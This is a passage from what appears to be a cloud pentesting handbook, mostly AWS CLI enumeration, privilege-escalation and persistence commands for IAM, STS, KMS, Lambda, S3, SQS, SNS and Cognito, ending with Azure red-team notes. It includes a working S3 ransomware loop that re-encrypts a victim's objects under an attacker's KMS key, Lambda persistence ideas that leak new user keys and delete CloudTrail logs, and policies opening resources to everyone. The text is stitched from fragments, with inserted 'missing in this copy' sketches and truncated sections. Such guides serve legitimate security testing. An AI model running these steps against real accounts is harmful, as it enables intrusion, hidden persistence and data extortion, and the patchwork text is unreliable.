aws efs describe-file-systems
aws efs describe-file-system-policy --file-system-id <id>
# Get subnetworks and IP addresses where you can find the file system
aws efs describe-mount-targets --file-system-id <id>
aws efs describe-mount-target-security-groups --mount-target-id <id>
## Mount found
sudo apt install nfs-common
sudo mount -t nfs4 -o nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2,noresvport <IP>:/ /efs
Privesc
aws-efs-privesc.md
Enumeration
aws-basic-information
Enumeration
Main permissions needed:
iam:ListRoles
iam:ListUsers
iam:ListGroups
iam:ListGroupsForUser
iam:ListAttachedUserPolicies
iam:ListAttachedRolePolicies
iam:ListAttachedGroupPolicies
# List users
aws iam list-users
aws iam list-ssh-public-keys #User keys for CodeCommit
aws iam get-ssh-public-key --user-name <username> --ssh-public-key-id <id> --encoding SSH #Get public key with metadata
aws iam list-service-specific-credentials #Get special permissions of the IAM user over specific services
aws iam get-user --user-name <username> #Get metadata of user
aws iam list-access-keys #List created access keys
## inline policies
aws iam list-user-policies --user-name <username> #Get inline policies of the user
aws iam get-user-policy --user-name <username> --policy-name <policyname> #Get inline policy details
## attached policies
aws iam list-attached-user-policies --user-name <username> #Get policies of user, it doesn't get inline policies
# List groups
aws iam list-groups #Get groups
aws iam list-groups-for-user --user-name <username> #Get groups of a user
aws iam get-group --group-name <name> #Get group name info
## inline policies
aws iam list-group-policies --group-name <username> #Get inline policies of the group
aws iam get-group-policy --group-name <username> --policy-name <policyname> #Get an inline policy info
## attached policies
aws iam list-attached-group-policies --group-name <name> #Get policies of group, it doesn't get inline policies
# List roles
aws iam list-roles #Get roles
aws iam get-role --role-name <role-name> #Get role
## inline policies
aws iam list-role-policies --role-name <name> #Get inline policies of a role
aws iam get-role-policy --role-name <name> --policy-name <name> #Get inline policy details
aws iam list-attached-role-policies --role-name <role-name> #Get policies of role, it doesn't get inline policies
# List policies
aws iam list-policies [--only-attached] [--scope Local]
aws iam list-policies-granting-service-access --arn <identity> --service-namespaces <svc> # Get list of policies that give access to the user to the service
## Get policy content
aws iam get-policy --policy-arn <policy_arn>
aws iam list-policy-versions --policy-arn <arn>
aws iam get-policy-version --policy-arn <arn:aws:iam::975426262029:policy/list_apigateways> --version-id <VERSION_X>
# Enumerate providers
aws iam list-saml-providers
aws iam get-saml-provider --saml-provider-arn <ARN>
aws iam list-open-id-connect-providers
aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
# Misc
aws iam get-account-password-policy
aws iam list-mfa-devices
aws iam list-virtual-mfa-devices
If you are interested in your own permissions but you don't have access to
query IAM you could always brute-force them using
https://github.com/andresriancho/enumerate-iam (don't forget to update
the API file as indicated in the instructions).
You could also use the tool weirdAAL which will indicate in the output the
actions you can perform in the most common AWS services.
# Install
git clone https://github.com/carnal0wnage/weirdAAL.git
cd weirdAAL
python3 -m venv weirdAAL
source weirdAAL/bin/activate
pip3 install -r requirements.txt
# Invoke it
python3 weirdAAL.py -m recon_all -t MyTarget
# You will see output such as:
# [+] elbv2 Actions allowed are [+]
# ['DescribeLoadBalancers', 'DescribeAccountLimits', 'DescribeTargetGroups']
Privesc
In the following page you can check how to abuse IAM permissions to
escalate privileges:
aws-iam-privesc.md
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": [
"*",
"arn:aws:iam::123213123123:root"
]
},
"Action": "sts:AssumeRole"
}
]
}
STS
AWS provides AWS Security Token Service (AWS STS) as a web service
that enables you to request temporary, limited-privilege credentials for
AWS Identity and Access Management (IAM) users or for users you
authenticate (federated users).
Enumeration
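The commands for this section appear to be missing in this copy; note that STS has no "list" APIs, so a minimal sketch only tells you about the credentials you hold:
aws sts get-caller-identity # Account, user/role ARN of the current credentials
aws sts get-access-key-info --access-key-id <AKIA...> # Account ID an access key belongs to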
Privesc
In the following page you can check how to abuse STS permissions to
escalate privileges:
aws-sts-privesc.md
Persistence
Assume role token
Temporary tokens cannot be listed, so maintaining an active temporary
token is a way to maintain persistence.
# With MFA
aws sts get-session-token \
--serial-number <mfa-device-name> \
--token-code <code-from-token>
optional arguments:
-h, --help show this help message and exit
-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST
[ROLE_LIST ...]
Post-Exploitation
cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console
aws-vault
aws-vault is a tool to securely store and access AWS credentials in a
development environment.
aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith
Wildcard as principal
{
    "Action": "sts:AssumeRole",
    "Effect": "Allow",
    "Principal": { "AWS": "*" }
}
Service as principal
{
"Action": "lambda:InvokeFunction",
"Effect": "Allow",
"Principal": { "Service": "apigateway.amazonaws.com" },
"Resource": "arn:aws:lambda:000000000000:function:foo"
}
This policy allows any account to configure their apigateway to call this
Lambda.
S3 as principal
"Condition": {
"ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" },
"StringEquals": {
"aws:SourceAccount": "123456789012"
}
}
Not supported
{
"Effect": "Allow",
"Principal": {"Service": "cloudtrail.amazonaws.com"},
"Action": "s3:PutObject",
"Resource":
"arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*"
}
Customer Master Keys (CMK): Can encrypt data up to 4KB in size. They
are typically used to create, encrypt, and decrypt the DEKs (Data
Encryption Keys). Then the DEKs are used to encrypt the data.
Key Policies
These define who can use and access a key in KMS.
By default:
It gives the AWS account that owns the KMS key full access to the KMS key.
Unlike other AWS resource policies, an AWS KMS key policy does not automatically give permission to the account or any of its users. To give permission to account administrators, the key policy must include an explicit statement that provides this permission, like this one.
Without this permission, IAM policies that allow access to the key are ineffective, although IAM policies that deny access to the key are still effective.
{
"Sid": "Enable IAM policies",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::111122223333:root"
},
"Action": "kms:*",
"Resource": "*"
}
If the account is allowed ("arn:aws:iam::111122223333:root"), a principal from the account will still need IAM permissions to use the KMS key. However, if the ARN of, for example, a role is specifically allowed in the Key Policy, that role doesn't need IAM permissions.
Policy Details
Properties of a policy:
Grants:
Access:
Via key policy -- If this exists, it takes precedence over the IAM policy
Via IAM policy
Via grants
Key Administrators
Key administrator by default:
Rotation of CMKs
The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, the wider the blast radius of data at risk. In addition to this, the longer the key is active, the higher the probability of it being breached.
KMS rotates customer managed keys every 365 days (or you can perform the process manually whenever you want) and keys managed by AWS every 3 years, and this period cannot be changed.
Older keys are retained to decrypt data that was encrypted prior to the rotation.
In a breach, rotating the key won't remove the threat as it will still be possible to decrypt all the data encrypted with the compromised key. However, the new data will be encrypted with the new key.
If the CMK is in a state of disabled or pending deletion, KMS will not perform a key rotation until the CMK is re-enabled or the deletion is cancelled.
Manual rotation
A new CMK needs to be created; then a new CMK-ID is created, so you will need to update any application to reference the new CMK-ID.
To make this process easier you can use aliases to refer to a key-id and then just update the key the alias is referring to.
You need to keep old keys to decrypt old files encrypted with them.
KMS has full audit and compliance integration with CloudTrail; this is
where you can audit all changes performed on KMS.
Limit who can create data keys and which services have access to use these keys.
Limit systems access to encrypt only, decrypt only or both.
Define whether to enable systems to access keys across regions (although it is not recommended, as a failure in the region hosting KMS will affect availability of systems in other regions).
You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across regions.
Enumeration
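The commands for this section appear to be missing in this copy; a minimal sketch of common KMS enumeration with standard AWS CLI calls:
aws kms list-keys
aws kms list-aliases
aws kms describe-key --key-id <key-id>
aws kms get-key-policy --key-id <key-id> --policy-name default
aws kms list-grants --key-id <key-id>
aws kms get-key-rotation-status --key-id <key-id>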
Privesc
aws-kms-privesc.md
Persistence
It's possible to grant access to keys to external accounts via KMS key
policies. Check the KMS Privesc page for more information.
References
https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html
Enumeration
aws lambda get-account-settings
# List layers
aws lambda list-layers
aws lambda list-layer-versions --layer-name <name>
aws lambda get-layer-version --layer-name <name> --version-number <ver>
# Invoke function
aws lambda invoke --function-name FUNCTION_NAME /tmp/out
## Some functions will expect parameters, they will access them with something like:
## target_policys = event['policy_names']
## user_name = event['user_name']
aws lambda invoke --function-name <name> --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess"], "user_name": "sdf"}' out.txt
Now that you know the name and the ID you can get the URL: https://<rest-api-id>.execute-api.<region>.amazonaws.com/<stageName>/<funcName>
Aliases Weights
A Lambda can have several versions, and it can have more than 1 version exposed via aliases. The weights of each of the versions exposed inside an alias will decide which version receives the invocation (it can be 90%-10% for example).\ If the code of one of the versions is vulnerable you can send requests until the vulnerable version receives the exploit.
Privesc
In the following page you can check how to abuse Lambda permissions to
escalate privileges:
aws-lambda-privesc
Unauthenticated Access
aws-lambda-unauthenticated-access.md
Persistence/Avoid Detection
API Gateway Lambda Proxy integration
It's possible to make an API Gateway call a Lambda with a custom execution role that the Lambda will use in its execution. You could assign here a privileged execution role and execute a controlled Lambda endpoint with it:
Resource-based policy
It's possible to add a resource policy to a lambda that will allow
principals even from external accounts to call the function.
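A minimal sketch of adding such a resource policy with standard Lambda CLI calls (statement id and account id are placeholders):
aws lambda add-permission --function-name <func_name> --statement-id backdoor-invoke --action lambda:InvokeFunction --principal <external_account_id>
aws lambda get-policy --function-name <func_name> # Review the resulting resource policy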
i. Note the final :1 of the arn indicating the version of the function
5. Select the POST method created and in Actions select Deploy API
6. Now, when you call the function via POST your Backdoor will be
invoked
Cron/Event actuator
The fact that you can make lambda functions run when something happens or when some time passes makes lambda a nice and common way to obtain persistence and avoid detection.\ Here you have some ideas to make your presence in AWS stealthier by creating lambdas (a minimal sketch follows the list below):
Every time a new user is created lambda generates a new user key and sends it to the attacker.
Every time a new role is created lambda gives assume role permissions to compromised users.
Every time new cloudtrail logs are generated, delete/alter them.
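A minimal sketch of wiring a Lambda to a scheduled EventBridge rule for persistence; rule name, function name and ARNs are placeholders:
aws events put-rule --name <rule_name> --schedule-expression "rate(1 day)"
aws events put-targets --rule <rule_name> --targets "Id"="1","Arn"="<lambda_arn>"
# Allow EventBridge to invoke the function
aws lambda add-permission --function-name <func_name> --statement-id cron-invoke --action lambda:InvokeFunction --principal events.amazonaws.com --source-arn <rule_arn>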
AWS - Lightsail Enum
AWS - Lightsail
Amazon Lightsail provides an easy, lightweight way for new cloud users to
take advantage of AWS’ cloud computing services. It allows you to deploy
common and custom web services in seconds via VMs (EC2) and
containers.
Enumeration
# Instances
aws lightsail get-instances #Get all
aws lightsail get-instance-port-states --instance-name <instance_name> #Get open ports
# Databases
aws lightsail get-relational-databases
aws lightsail get-relational-database-snapshots
aws lightsail get-relational-database-parameters
# More
aws lightsail get-load-balancers
aws lightsail get-static-ips
aws lightsail get-key-pairs
Analyse Snapshots
It's possible to generate instance and relational database snapshots from
lightsail. Therefore you can check those the same way you can check EC2
snapshots and RDS snapshots.
Metadata
Metadata endpoint is accessible from lightsail, but the machines are
running in an AWS account managed by AWS so you don't control what
permissions are being granted. However, if you find a way to exploit
those you would be directly exploiting AWS.
Privesc
In the following page you can check how to abuse Lightsail permissions to escalate privileges:
aws-lightsail-privesc.md
AWS - RabbitMQ
RabbitMQ is a message-queueing software also known as a message
broker or queue manager. Simply said; it is software where queues are
defined, to which applications connect in order to transfer a message or
messages.
A message can include any kind of information. It could, for example, have
information about a process or task that should start on another application
(which could even be on another server), or it could be just a simple text
message. The queue-manager software stores the messages until a receiving
application connects and takes a message off the queue. The receiving
application then processes the message.
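The enumeration commands for Amazon MQ (the managed RabbitMQ/ActiveMQ service) appear to be missing in this copy; a minimal sketch with standard aws mq calls:
aws mq list-brokers
aws mq describe-broker --broker-id <broker-id> # Endpoints, public accessibility, auth strategy
aws mq list-users --broker-id <broker-id>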
Types
There are 2 types of Kafka clusters that AWS allows you to create: Provisioned and Serverless.
Enumeration
#Get clusters
aws kafka list-clusters
aws kafka list-clusters-v2
# Read messages
kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer.config client.properties --topic msk-serverless-tutorial --from-beginning
Privesc
aws-msk-privesc.md
Unauthenticated Access
aws-msk-unauthenticated-enum.md
Persistence
If you have access to the VPC where a Provisioned Kafka cluster is, you could enable unauthenticated access, read the password from the secret if SASL/SCRAM authentication is used, give some other controlled user IAM permissions (if IAM or serverless is used) or persist with certificates.
References
https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html
IP-based routing
This is useful to tune your DNS routing to make the best DNS routing
decisions for your end users.\ IP-based routing offers you the additional
ability to optimize routing based on specific knowledge of your
customer base.
Enumeration
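The commands for this section (Route 53) appear to be missing in this copy; a minimal sketch with standard AWS CLI calls:
aws route53 list-hosted-zones
aws route53 list-resource-record-sets --hosted-zone-id <zone-id>
aws route53domains list-domains --region us-east-1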
AWS Secrets Manager enables the easy rotation of secrets, thereby enhancing the security of those secrets. An example of this could be your database credentials. Other secret types can also have automatic rotation enabled through the use of lambda functions, for example, API keys.
To allow a user from a different account to access your secret you need to authorize them to access the secret and also authorize them to decrypt the secret in KMS. The Key policy also needs to allow the external user to use it.
Enumeration
aws secretsmanager list-secrets #Get metadata of all secrets
aws secretsmanager list-secret-version-ids --secret-id <secret_name> # Get versions
aws secretsmanager describe-secret --secret-id <secret_name> # Get metadata
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value
aws secretsmanager get-resource-policy --secret-id <secret_name>
Persistence
It's possible to grant access to secrets to external accounts via secret resource policies. Check the Secrets Manager Privesc page for more information. Note that to access a secret, the external account will also need access to the KMS key encrypting the secret.
Privesc
aws-secrets-manager-privesc.md
Enumeration
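The commands for this section appear to be missing in this copy; a minimal sketch of SQS enumeration with standard AWS CLI calls:
aws sqs list-queues
aws sqs get-queue-attributes --queue-url <queue-url> --attribute-names All # Includes the access policy
aws sqs receive-message --queue-url <queue-url>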
Persistence
In SQS you need to indicate with an IAM policy who has access to read
and write. It's possible to indicate external accounts, ARN of roles, or even
"*".\ The following policy gives everyone in AWS access to everything in
the queue called MyTestQueue:
{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__owner_statement",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SQS:*"
],
"Resource": "arn:aws:sqs:us-east-
1:123123123123:MyTestQueue"
}
]
}
Enumeration
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>
Persistence
When creating a SNS topic you need to indicate with an IAM policy who
has access to read and write. It's possible to indicate external accounts,
ARN of roles, or even "*".\ The following policy gives everyone in AWS
access to read and write in the SNS topic called MySNS.fifo :
{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__default_statement_ID",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SNS:Publish",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:DeleteTopic",
"SNS:ListSubscriptionsByTopic",
"SNS:GetTopicAttributes",
"SNS:AddPermission",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-
1:318142138553:MySNS.fifo",
"Condition": {
"StringEquals": {
"AWS:SourceOwner": "318142138553"
}
}
},
{
"Sid": "__console_pub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Publish",
"Resource": "arn:aws:sns:us-east-
1:318142138553:MySNS.fifo"
},
{
"Sid": "__console_sub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-
1:318142138553:MySNS.fifo"
}
]
}
S3 Access logs
It's possible to enable S3 access logging (which by default is disabled) for a bucket and save the logs in a different bucket to know who is accessing the bucket (both buckets must be in the same region).
S3 Encryption Mechanisms
DEK means Data Encryption Key and is the key that is always generated
and used to encrypt data.
Encryption:
Object Data + created plaintext DEK --> Encrypted data (stored
inside S3)
Created plaintext DEK + S3 Master Key --> Encrypted DEK
(stored inside S3) and plain text is deleted from memory
Decryption:
Encrypted DEK + S3 Master Key --> Plaintext DEK
Plaintext DEK + Encrypted data --> Object Data
Please, note that in this case the key is managed by AWS (rotation only every 3 years). If you use your own key you will be able to rotate, disable and apply access control. (A minimal upload example follows the mechanism descriptions below.)
Encryption:
S3 requests data keys from the KMS CMK
KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and sends them to S3
S3 uses the plaintext key to encrypt the data, stores the encrypted data and the encrypted key and deletes the plaintext key from memory
Decryption:
S3 asks KMS to decrypt the encrypted data key of the object
KMS decrypts the data key with the CMK and sends it back to S3
S3 decrypts the object data
Encryption:
The user sends the object data + Customer key to S3
The customer key is used to encrypt the data and the encrypted data is stored
A salted HMAC value of the customer key is also stored for future key validation
The customer key is deleted from memory
Decryption:
The user sends the customer key
The key is validated against the HMAC value stored
The customer provided key is then used to decrypt the data
Encryption:
The client requests a data key from KMS
KMS returns the plaintext DEK and the DEK encrypted with the CMK
Both keys are sent back
The client then encrypts the data with the plaintext DEK and sends to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3)
Decryption:
The encrypted data with the encrypted DEK is sent to the client
The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK
The client can now decrypt the encrypted data
Encryption:
The client generates a DEK and encrypts the plaintext data
Then, using its own custom CMK, it encrypts the DEK
It submits the encrypted data + encrypted DEK to S3 where they are stored
Decryption:
S3 sends the encrypted data and DEK
As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data
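A minimal sketch of requesting server-side encryption when uploading, using standard aws s3 flags (the key ARN is a placeholder):
aws s3 cp file.txt s3://<bucket>/file.txt --sse AES256 # SSE-S3 (AWS managed keys)
aws s3 cp file.txt s3://<bucket>/file.txt --sse aws:kms --sse-kms-key-id <cmk-arn> # SSE-KMS with your own CMK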
Enumeration
One of the traditional main ways of compromising AWS orgs starts by compromising publicly accessible buckets. You can find public bucket enumerators on this page.
# Get buckets ACLs
aws s3api get-bucket-acl --bucket <bucket-name>
aws s3api get-object-acl --bucket <bucket-name> --key flag
# Get policy
aws s3api get-bucket-policy --bucket <bucket-name>
aws s3api get-bucket-policy-status --bucket <bucket-name> #if
it's public
# delete
aws s3 rb s3://bucket-name --force
dual-stack
You can access an S3 bucket through a dual-stack endpoint by using a
virtual hosted-style or a path-style endpoint name. These are useful to
access S3 through IPv6.
bucketname.s3.dualstack.aws-region.amazonaws.com
s3.dualstack.aws-region.amazonaws.com/bucketname
Privesc
In the following page you can check how to abuse S3 permissions to
escalate privileges:
aws-s3-privesc.md
Unauthenticated Access
aws-s3-unauthenticated-enum.md
Persistence
S3 Ransomware
s3-ransomware.md
Amazon Athena
Amazon Athena is an interactive query service that makes it easy to
analyze data directly in Amazon Simple Storage Service (Amazon S3)
using standard SQL.
You need to prepare a relational DB table with the format of the content
that is going to appear in the monitored S3 buckets. And then, Amazon
Athena will be able to populate the DB from the logs, so you can query it.
SSE-C and CSE-E are not supported. In addition to this, it's important to
understand that Amazon Athena will only run queries against encrypted
objects that are in the same region as the query itself. If you need to
query S3 data that's been encrypted using KMS, then specific permissions
are required by the Athena user to enable them to perform the query.
Enumeration
# Get catalogs
aws athena list-data-catalogs
# Run query
aws athena start-query-execution --query-string <query>
References
https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3
https://hackingthe.cloud/aws/post_exploitation/s3_acl_persistence/
https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html
The following screenshot shows an example of a file that was targeted for a
ransomware attack. As you can see, the account ID that owns the KMS key
that was used to encrypt the object (7**********2) is different than the
account ID of the account that owns the object (2**********1).
Here you can find a ransomware example that does the following:
1. Gathers the first 100 objects in the bucket (or all, if fewer than 100
objects in the bucket)
2. One by one, overwrites each object with itself using the new KMS
encryption key
For more info check the original research.
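A minimal sketch of those two steps with standard s3api calls, assuming an attacker-controlled KMS key and object keys without whitespace (bucket and key ARN are placeholders):
BUCKET=<victim-bucket>
KEY_ARN=<attacker-kms-key-arn>
# 1. Gather (up to) the first 100 object keys
for key in $(aws s3api list-objects-v2 --bucket "$BUCKET" --max-items 100 --query 'Contents[].Key' --output text); do
    # 2. Overwrite each object with itself, re-encrypted with the attacker's KMS key
    aws s3api copy-object --bucket "$BUCKET" --key "$key" --copy-source "$BUCKET/$key" --server-side-encryption aws:kms --ssekms-key-id "$KEY_ARN"
done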
https://github.com/carlospolop/leakos
https://github.com/carlospolop/pastos
https://github.com/carlospolop/gorks
AWS Unauthenticated Enum & Access
There are several services in AWS that could be configured giving some
kind of access to all Internet or to more people than expected. Check here
how:
During the talk they specify several examples, such as S3 buckets allowing cloudtrail (of any AWS account) to write to them:
AWS Config
Serverless repository
Tools
cloud_enum: Multi-cloud OSINT tool. Find public resources in
AWS, Azure, and Google Cloud. Supported AWS services: Open /
Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.)
Brute-Force
You create a list of potential account IDs and aliases and check them
OSINT
Look for URLs that contain <alias>.signin.aws.amazon.com with an alias related to the organization.
Marketplace
If a vendor has instances in the marketplace, you can get the owner id
(account id) of the AWS account he used.
Snapshots
Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots)
RDS public snapshots (RDS -> Snapshots -> All Public Snapshots)
Public AMIs (EC2 -> AMIs -> Public images)
Errors
Many AWS error messages (even access denied) will give that information.
References
https://www.youtube.com/watch?v=8ZXRw4Ry3mQ
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Permission",
"Action": [
"execute-api:Execution-operation"
],
"Resource": [
"arn:aws:execute-api:region:account-id:api-
id/stage/METHOD_HTTP_VERB/Resource-path"
]
}
]
}
The problem with this way to give permissions to invoke endpoints is that
the "*" implies "anything" and there is no more regex syntax
supported.
Some examples:
Note that "*" doesn't stop expanding with slashes, therefore, if you use
"*" in api-id for example, it could also indicate "any stage" or "any method"
as long as the final regex is still valid.\ So arn:aws:execute-apis:sa-east-
You should always be clear about what you want to allow access to, and then check whether other scenarios are possible with the permissions granted.
For more info, apart of the docs, you can find code to implement
authorizers in this official aws github.
https://{random_id}.execute-api.
{region}.amazonaws.com/{user_provided}
https://{random_id}.cloudfront.net
aws-cognito-enum
Identity Pool ID
Identity Pools can grant IAM roles to unauthenticated users that just know the Identity Pool ID (which is fairly common to find), and an attacker with this info could try to access that IAM role and exploit it.\ Moreover, IAM roles could also be assigned to authenticated users that access the Identity Pool. If an attacker can register a user or already has access to the identity provider used in the identity pool, they could access the IAM role being given to authenticated users and abuse its privileges.
User Pool ID
By default Cognito allows registering new users. Being able to register a user might give you access to the underlying application or to the authenticated IAM access role of an Identity Pool that is accepting the Cognito User Pool as identity provider. Check how to do that here.
<name>.cluster-<random>.<region>.docdb.amazonaws.com
# Public AMIs
aws ec2 describe-images --executable-users all
## Search AMI by ownerID
aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `967541184254/`) == `true`]'
## Search AMI by substr ("shared" in the example)
aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `shared`) == `true`]'
# EC2
ec2-{ip-separated}.compute-1.amazonaws.com
# ELB
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
AWS - Elasticsearch
Unauthenticated Enum
https://vpc-{user_provided}-[random].[region].es.amazonaws.com
https://search-{user_provided}-[random].[region].es.amazonaws.com
If you try to assume a role that you don’t have permissions to, AWS will
output an error similar to:
You can use this script to enumerate potential principals abusing this issue.
When you save the policy, if the resource is found, the trust policy will
save successfully, but if it is not found, then an error will be thrown,
indicating an invalid principal was supplied.
Note that in that resource you could specify a cross account role or user:
arn:aws:iam::acc_id:role/role_name
arn:aws:iam::acc_id:user/user_name
This is a policy example:
{
"Version":"2012-10-17",
"Statement":[
{
"Effect":"Allow",
"Principal":
{
"AWS":"arn:aws:iam::216825089941:role\/Test"
},
"Action":"sts:AssumeRole"
}
]
}
GUI
That is the error you will find if you use a role that doesn't exist. If the role exists, the policy will be saved without any errors. (The error is for update, but it also works when creating.)
CLI
### You could also use: aws iam update-assume-role-policy
# When it works
aws iam create-role --role-name Test-Role --assume-role-policy-document file://a.json
{
"Role": {
"Path": "/",
"RoleName": "Test-Role",
"RoleId": "AROA5ZDCUJS3DVEIYOB73",
"Arn": "arn:aws:iam::947247140022:role/Test-Role",
"CreateDate": "2022-05-03T20:50:04Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS":
"arn:aws:iam::316584767888:role/account-balance"
},
"Action": [
"sts:AssumeRole"
]
}
]
}
}
}
./unauth_wordlist.txt
Privesc
In case the role is badly configured and allows anyone to assume it, the attacker could just assume it.
Third Party OIDC Federation
Imagine that you manage to read a Github Actions workflow that is
accessing a role inside AWS.\ This trust might give access to a role with the
following trust policy:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::<acc_id>:oidc-
provider/token.actions.githubusercontent.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"token.actions.githubusercontent.com:aud":
"sts.amazonaws.com"
}
}
}
]
}
This trust policy might be correct, but the lack of more conditions should make you distrust it.\ This is because the previous role can be assumed by ANYONE from Github Actions! You should also specify other things in the conditions, such as org name, repo name, env, branch...
"StringLike": {
"token.actions.githubusercontent.com:sub":
"repo:org_name*:*"
}
Note the wildcard (*) before the colon (:). You can create an org such as org_name1 and assume the role from a Github Action.
References
https://www.youtube.com/watch?v=8ZXRw4Ry3mQ
https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/
https://hackingthe.cloud/aws/enumeration/enum_iam_user_role/
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
https://{random_id}.kinesisvideo.{region}.amazonaws.com
https://{random_id}.lambda-url.{region}.on.aws/
https://{random_id}.mediaconvert.{region}.amazonaws.com
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
https://{random_id}.data.mediastore.{region}.amazonaws.com
ActiveMQ
In case of ActiveMQ, by default public access and ssl are enabled, but you
need credentials to access.
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
Public Port
It's possible to expose the Kafka broker to the public, but you will need
credentials, IAM permissions or a valid certificate (depending on the auth
method configured).
It's also possible to disable authentication, but in that case it's not possible to directly expose the port to the Internet.
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
{user_provided}.<random>.<region>.redshift.amazonaws.com
https://sqs.[region].amazonaws.com/[account-id]/{user_provided}
Brute-Force
You can find buckets by brute-forcing names related to the company you
are pentesting:
https://github.com/sa7mon/S3Scanner
https://github.com/clario-tech/s3-inspector
https://github.com/jordanpotti/AWSBucketDump (Contains a list with
potential bucket names)
https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets
https://github.com/smaranchand/bucky
https://github.com/tomdev/teh_s3_bucketeers
https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3
https://github.com/Eilonh/s3crets_scanner
# Generate a wordlist to create permutations
curl -s https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt > /tmp/words-s3.txt.temp
curl -s https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt >> /tmp/words-s3.txt.temp
cat /tmp/words-s3.txt.temp | sort -u > /tmp/words-s3.txt
## Call s3scanner
s3scanner --threads 100 scan --buckets-file /tmp/final-words-s3.txt | grep bucket_exists
By DNS
You can get the region of a bucket with a dig and nslookup by doing a
DNS request of the discovered IP:
dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11
nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-
2.amazonaws.com.
Check that the resolved domain has the word "website".\ You can access the static website by going to: flaws.cloud.s3-website-us-west-2.amazonaws.com
By Trying
If you try to access a bucket, but in the domain name you specify another region (for example the bucket is in bucket.s3.amazonaws.com but you try to access bucket.s3-website-us-west-2.amazonaws.com), then you will be pointed to the correct location:
Open to everyone:
Private:
If the bucket doesn't have a domain name, when trying to enumerate it, only put the bucket name and not the whole AWS S3 domain. Example: s3://<BUCKETNAME>
https://{user_provided}.s3.amazonaws.com
References
https://www.youtube.com/watch?v=8ZXRw4Ry3mQ
Basic Information
az-basic-information.md
Azure Pentester/Red Team
Methodology
In order to audit an AZURE environment it's very important to know: which services are being used, what is being exposed, who has access to what, and how internal Azure services and external services are connected.
From a Red Team point of view, the first step to compromise an Azure
environment is to manage to obtain some credentials for Azure AD. Here
you have some ideas on how to do that:
C:\Users\USERNAME\.azure
Even if you haven't compromised any user inside the Azure tenant you
are attacking, you can gather some information from it:
az-unauthenticated-enum-and-initial-entry
After you have managed to obtain credentials, you need to know who those creds belong to, and what they have access to, so you need to perform some basic enumeration:
Basic Enumeration
Remember that the noisiest part of the enumeration is the login, not the
enumeration itself.
SSRF
If you found a SSRF in a machine inside Azure check this page for tricks:
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-
forgery/cloud-ssrf
In cases where you have some valid credentials but you cannot login, these
are some common protections that could be in place:
After bypassing it, you might be able to get back to your initial setup and
you will still have access.
Whoami
Learn how to install az cli, AzureAD and Az PowerShell in the Az -
